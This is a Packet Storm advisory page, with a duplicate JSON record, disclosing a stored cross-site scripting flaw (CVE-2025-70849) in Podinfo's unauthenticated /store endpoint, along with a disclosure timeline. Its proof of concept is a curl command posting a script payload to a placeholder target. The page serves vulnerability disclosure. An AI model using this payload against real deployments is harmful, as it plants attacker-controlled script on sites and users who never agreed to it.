📄 Podinfo 6.10.0 Cross Site Scripting_PACKETSTORM:214803

Description

Podinfo versions 6.10.0 and below suffer from a cross site scripting vulnerability...

Basic Information

ID PACKETSTORM:214803

Published Feb 3, 2026 at 00:00

Affected Product

Affected Versions # CVE-2025-70849: Stored XSS in Podinfo

## Summary
A security vulnerability (CWE-79) was identified in **Podinfo**, a web application for demonstrating Kubernetes microservices. The `/store` feature allows unauthenticated users to upload arbitrary HTML/JS content, leading to Stored XSS.

## Vulnerability Details
- **CVE ID:** CVE-2025-70849
- **Product:** Podinfo
- **Affected Endpoint:** `/store`
- **Vulnerability Type:** Stored Cross-Site Scripting (XSS)
- **Affected Versions:** `<= 6.10.0`

## Proof of Concept (PoC)
1. Send the malicious payload:
```bash
curl -X POST https://<target>/store -H "Content-Type: application/text" -d '<html><script>alert("CVE-2025-70849")</script></html>'
```
2. Access the returned hash: https://<target>/store/<hash>

## Timeline
- **Discovery:** Sep 2025
- **Vendor Notified:** 25 OCT 2025
- **Vendor Response:** Acknowledged; stated no current timeline for fix.
- **Public Disclosure:** February 2026

Disclaimer
This research is for educational purposes only.
---

{
    "lastseen": "2026-02-03T20:21:22",
    "description": "Podinfo versions 6.10.0 and below suffer from a cross site scripting vulnerability...",
    "published": "2026-02-03T00:00:00",
    "modified": "2026-02-03T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Podinfo 6.10.0 Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214803",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-70849"
    ],
    "sourceData": "# CVE-2025-70849: Stored XSS in Podinfo\n    \n    ## Summary\n    A security vulnerability (CWE-79) was identified in **Podinfo**, a web application for demonstrating Kubernetes microservices. The `/store` feature allows unauthenticated users to upload arbitrary HTML/JS content, leading to Stored XSS.\n    \n    ## Vulnerability Details\n    - **CVE ID:** CVE-2025-70849\n    - **Product:** Podinfo\n    - **Affected Endpoint:** `/store`\n    - **Vulnerability Type:** Stored Cross-Site Scripting (XSS)\n    - **Affected Versions:** `<= 6.10.0`\n    \n    ## Proof of Concept (PoC)\n    1. Send the malicious payload:\n       ```bash\n       curl -X POST https://<target>/store -H \"Content-Type: application/text\" -d '<html><script>alert(\"CVE-2025-70849\")</script></html>'\n       ```\n    2. Access the returned hash: https://<target>/store/<hash>\n    \n    ## Timeline\n    - **Discovery:** Sep 2025\n    - **Vendor Notified:** 25 OCT 2025\n    - **Vendor Response:** Acknowledged; stated no current timeline for fix.\n    - **Public Disclosure:** February 2026\n    \n    Disclaimer\n    This research is for educational purposes only.\n    ---",
    "sourceHref": "https://packetstorm.news/download/214803",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214803/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply